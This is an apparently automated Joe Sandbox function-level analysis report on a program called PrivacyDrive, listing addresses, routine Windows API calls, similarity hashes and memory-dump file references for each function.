                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressCurrentHandleModuleProcProcess
                                • String ID: IsWow64Process$kernel32
                                • API String ID: 4190356694-3789238822
                                • Opcode ID: 903152296c2ea943cea53cf59f37d2001c8a9bd07ba76ec03c0ff66c12262fcd
                                • Instruction ID: 4eb353d676ab66b3e10b858cb82342fdd131ff1ba5c45fbc87e9acfb05d64e88
                                • Opcode Fuzzy Hash: 903152296c2ea943cea53cf59f37d2001c8a9bd07ba76ec03c0ff66c12262fcd
                                • Instruction Fuzzy Hash: ACF01C769413109BCF79EF64FC1AEC53BA6F724746F080A06F411D32A0C778A448EB51
                                Function 004EE390 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateRegion.GDIPLUS(?,7563D392,?,?,?), ref: 004EE3C5
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 004EE4AC
                                • GdipSetStringFormatMeasurableCharacterRanges.GDIPLUS(?,00000001,00000000), ref: 004EE4D8
                                • GdipGetRegionBounds.GDIPLUS(00000000,?,00000000,?,00000000,?,00000000,?,?,?), ref: 004EE527
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004EE54F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Region$String$BoundsCharacterCreateDeleteFormatMeasurableMeasureRanges
                                • String ID:
                                • API String ID: 2862540553-0
                                • Opcode ID: d21c68119743c5368ee9835d4fb6ca6a56a2c54fbb75767020cfc1576227397e
                                • Instruction ID: 24c2b81997005cf861c3c7e384ce6e9b24adc1cd5d3a5120f466a13335877674
                                • Opcode Fuzzy Hash: d21c68119743c5368ee9835d4fb6ca6a56a2c54fbb75767020cfc1576227397e
                                • Instruction Fuzzy Hash: DA5179B1900209EFDB14CF96D894BDEBBB4FF49305F10861AE416BB290D775A908CFA4
                                Function 004754B0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 118COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004A83C0: _memset.LIBCMT ref: 004A83E7
                                  • Part of subcall function 004A83C0: _memset.LIBCMT ref: 004A8486
                                  • Part of subcall function 004A83C0: GetVersionExW.KERNEL32(00000114,?,00000110,005BDDE8,00000000,000003B8), ref: 004A8495
                                  • Part of subcall function 00412230: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00412288
                                • InitializeCriticalSection.KERNEL32(005BE2CC,?,?,?,?,000000FF,?,00401225), ref: 00475679
                                  • Part of subcall function 00403950: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0040398C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memset$CriticalInitializeSectionVersion
                                • String ID: !@$4[$[$[
                                • API String ID: 1439776824-573984393
                                • Opcode ID: f6cdcf9e5209f496280de21f878bea33775a3dfe0d11f000bee28cbae6e171dd
                                • Instruction ID: dbf5fe5d0be854726b5789bbc29cf0d9a9f6ef3976c8143a628423fa3c4f3b26
                                • Opcode Fuzzy Hash: f6cdcf9e5209f496280de21f878bea33775a3dfe0d11f000bee28cbae6e171dd
                                • Instruction Fuzzy Hash: EC6110B4805385DED780CF68E919799BFF4BB25308F14465DD0849B3A1E3B9360CEBA5
                                Function 004B0BF0 Relevance: 7.6, APIs: 5, Instructions: 105windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0C1E
                                  • Part of subcall function 00496130: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004961BB
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0C50
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0D22
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0D41
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID:
                                • API String ID: 2222842502-0
                                • Opcode ID: 1f116de3a47cf7a54eeb36d370a3b235255416f006492a93511ae256617e7dff
                                • Instruction ID: a30a1b573ef29b5b96af9d62f7259acb422750a5e2e9245828b27b54f58e7c0f
                                • Opcode Fuzzy Hash: 1f116de3a47cf7a54eeb36d370a3b235255416f006492a93511ae256617e7dff
                                • Instruction Fuzzy Hash: 7041C534A103049FE724DB98CC4AFE677A9AF40705F18417EE605AF2D2CB697805CB79
                                Function 0040EAA0 Relevance: 7.6, APIs: 5, Instructions: 81synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(?,7563D392,?,?,?,7563D392), ref: 0040EAD4
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040EAFE
                                • TerminateThread.KERNEL32(00000000,00000000), ref: 0040EB15
                                • CloseHandle.KERNEL32(00000000), ref: 0040EB37
                                  • Part of subcall function 0040EBC0: SetEvent.KERNEL32(?,?,0040EAF4), ref: 0040EBCD
                                  • Part of subcall function 0040EBC0: Sleep.KERNEL32(0000000A,?,?,0040EAF4), ref: 0040EBE2
                                • LeaveCriticalSection.KERNEL32(?), ref: 0040EBA3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$CloseEnterEventHandleLeaveObjectSingleSleepTerminateThreadWait
                                • String ID:
                                • API String ID: 2406323708-0
                                • Opcode ID: 1379cd60b4a5ee7837ccced63a34ce483ddc240657569a269f744bfa56d5bbd3
                                • Instruction ID: 96cd679fe5e2841fb83fed345f25171e71f902508a63437040f38c90d22f781c
                                • Opcode Fuzzy Hash: 1379cd60b4a5ee7837ccced63a34ce483ddc240657569a269f744bfa56d5bbd3
                                • Instruction Fuzzy Hash: 7F316CB5901705DBCB20CF66D808B5AFBF8FF05724F104A2EE466A3AD0C778A954CB95
                                Function 004CE5E0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • LoadCursorW.USER32(00000000,00007F02), ref: 004CE601
                                • SetCursor.USER32(00000000), ref: 004CE608
                                • LoadCursorW.USER32(00000000,00007F02), ref: 004CE649
                                • SetCursor.USER32(00000000), ref: 004CE650
                                • IsWindow.USER32(00000000), ref: 004CE6A3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Cursor$Load$Window
                                • String ID:
                                • API String ID: 373611324-0
                                • Opcode ID: 80d91b399186214c2651975e6940cc0bbb9066883ef3d4eb70c98f20f680720f
                                • Instruction ID: 267e152b442c7c50a868fcf03e1327f48bcbf66dd67a20fd02bcc9c93849e241
                                • Opcode Fuzzy Hash: 80d91b399186214c2651975e6940cc0bbb9066883ef3d4eb70c98f20f680720f
                                • Instruction Fuzzy Hash: CA21BD38350300EBEB755B26C909F7A7394BF20B05F84041EF6429A2C0CBB8A841DB5D
                                Function 0050E359 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 0050E365
                                  • Part of subcall function 00500F9C: __FF_MSGBANNER.LIBCMT ref: 00500FB3
                                  • Part of subcall function 00500F9C: __NMSG_WRITE.LIBCMT ref: 00500FBA
                                  • Part of subcall function 00500F9C: HeapAlloc.KERNEL32(?,00000000,00000001,?,?,?,?,004FFD1B,?,7563D392), ref: 00500FDF
                                • _free.LIBCMT ref: 0050E378
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocHeap_free_malloc
                                • String ID:
                                • API String ID: 2734353464-0
                                • Opcode ID: 76d684e341c728009a91389e18dedc87e07ec3a22d4821cbdf9cb951d379d52c
                                • Instruction ID: 90c6dda660f17eee0961a91b50970eb708e17461c93d32334f97f4849b3dc1ec
                                • Opcode Fuzzy Hash: 76d684e341c728009a91389e18dedc87e07ec3a22d4821cbdf9cb951d379d52c
                                • Instruction Fuzzy Hash: 3A11A336508B17ABCB213B74AC4A69E3F99BF50361F304D25F9099B1E1EB74A8409B94
                                Function 004A88E0 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadImageW.USER32(?,9015FF56,00000001,00000000,00000000,00000000), ref: 004A88FC
                                • DestroyIcon.USER32(00000000,?,004A6EBB,0000008C), ref: 004A8910
                                • DestroyIcon.USER32(00000000,?,004A6EBB,0000008C), ref: 004A8937
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DestroyIcon$ImageLoad
                                • String ID:
                                • API String ID: 2072966803-0
                                • Opcode ID: 5fbff504c426228288b781d8390ea03c8d9c0093c7f46b6ed690fb1a758187bb
                                • Instruction ID: da45c423426458ab6a0a238f7bb99dc166bc3e05a4018f4358c60fd1bd14c7a3
                                • Opcode Fuzzy Hash: 5fbff504c426228288b781d8390ea03c8d9c0093c7f46b6ed690fb1a758187bb
                                • Instruction Fuzzy Hash: F4014F72200310DBD7205B99EC08BE7F7ECEB61B62F00402BF645D71A0C6B56948DBE5
                                Function 0040A810 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 318COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 498bd7e8d8ab5aedfa992c99d6e4fcdc811703f614c4ef557d89a7882a801635
                                • Instruction ID: c13d8002d9a48abe8ce0c21eadc1977aca9ba67ba95ebffee4780369b024578c
                                • Opcode Fuzzy Hash: 498bd7e8d8ab5aedfa992c99d6e4fcdc811703f614c4ef557d89a7882a801635
                                • Instruction Fuzzy Hash: E6C15171700205DBCB14CF58C5D48AEB7B6FF85304720493EE442AB295D738ED66CB9A
                                Function 004B41A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,?,00000288), ref: 004B42C9
                                  • Part of subcall function 004B3610: FindClose.KERNEL32(00000000,7563D392,0040FFE5,005BE234,?,?,?,0054A882,000000FF,?,004B424C,?), ref: 004B3687
                                  • Part of subcall function 004B3610: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004B3720
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseFileFindQueryReadValue
                                • String ID: !@$%sPortable.xml$aes
                                • API String ID: 1808956909-4193344564
                                • Opcode ID: 01d5c5a24089f0c1a0fae5e8ec9ceb500feb15f0ec43c3dd4ae035b4ea993f7a
                                • Instruction ID: 6f1b460700e761cc4abc6efbcd98f60330be9bf1a8f82da461a7fdec2389ad11
                                • Opcode Fuzzy Hash: 01d5c5a24089f0c1a0fae5e8ec9ceb500feb15f0ec43c3dd4ae035b4ea993f7a
                                • Instruction Fuzzy Hash: 99A1A570900218AFDB20DF64CC49BEEBBB4BF04718F50419AE509B7282DB785B88CF65
                                Function 00440760 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameSave_memset
                                • String ID: !@$X
                                • API String ID: 1534219092-4222592482
                                • Opcode ID: 3ce067d345ddd39821ab6f349ea4c35892f0cd05f295f0354a6bba2d33233745
                                • Instruction ID: c4718d24e90160dd7e81a3c53885e8b2e8944d4bd852699be5995abf9a0bf4a4
                                • Opcode Fuzzy Hash: 3ce067d345ddd39821ab6f349ea4c35892f0cd05f295f0354a6bba2d33233745
                                • Instruction Fuzzy Hash: 21A14B70608380CFE774DF24C849B9BBBE5BF95308F104A2EE59987291DB75A418CB97
                                Function 00416A90 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 224COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004166A0: EnterCriticalSection.KERNEL32(005BDCE4), ref: 004166B0
                                  • Part of subcall function 004166A0: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004166C8
                                  • Part of subcall function 004166A0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 004166F5
                                  • Part of subcall function 004166A0: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416707
                                  • Part of subcall function 004166A0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 00416734
                                  • Part of subcall function 004166A0: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416746
                                  • Part of subcall function 004169B0: TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004169B8
                                  • Part of subcall function 004169B0: LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SPLASH), ref: 004169DF
                                • _memmove.LIBCMT ref: 00416B7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$_memmove
                                • String ID: COPYRIGHT_INFORMATION$String$Version.xml
                                • API String ID: 1145044787-240694523
                                • Opcode ID: 60954804e4b2ff68d057d59161eb9795ffbd489a9a02b5732f9179375e6b78ea
                                • Instruction ID: f0b79cddade3e81fb812715542dedb2745c283eaef7473b2f8ddbe8d91f7a391
                                • Opcode Fuzzy Hash: 60954804e4b2ff68d057d59161eb9795ffbd489a9a02b5732f9179375e6b78ea
                                • Instruction Fuzzy Hash: 29A116B06083419FE750CF25C84579BBBE4BF88748F04492EF495C7291EBB8E948CB96
                                Function 0044C240 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameOpen_memset
                                • String ID: !@$X
                                • API String ID: 4292185452-4222592482
                                • Opcode ID: 3e06d062255209bf364fbaa4e34eda6ee83036db0a724104dc5e9999704779f7
                                • Instruction ID: 419109be963f109e5df0a888b0f0c5a29ee3271ce28584c256a495edffd8ffa3
                                • Opcode Fuzzy Hash: 3e06d062255209bf364fbaa4e34eda6ee83036db0a724104dc5e9999704779f7
                                • Instruction Fuzzy Hash: 2DA11970609380CBE774CF25C988B9BBBE5BF85308F144A2EE58D87291DB75A448CB57
                                Function 00440B80 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
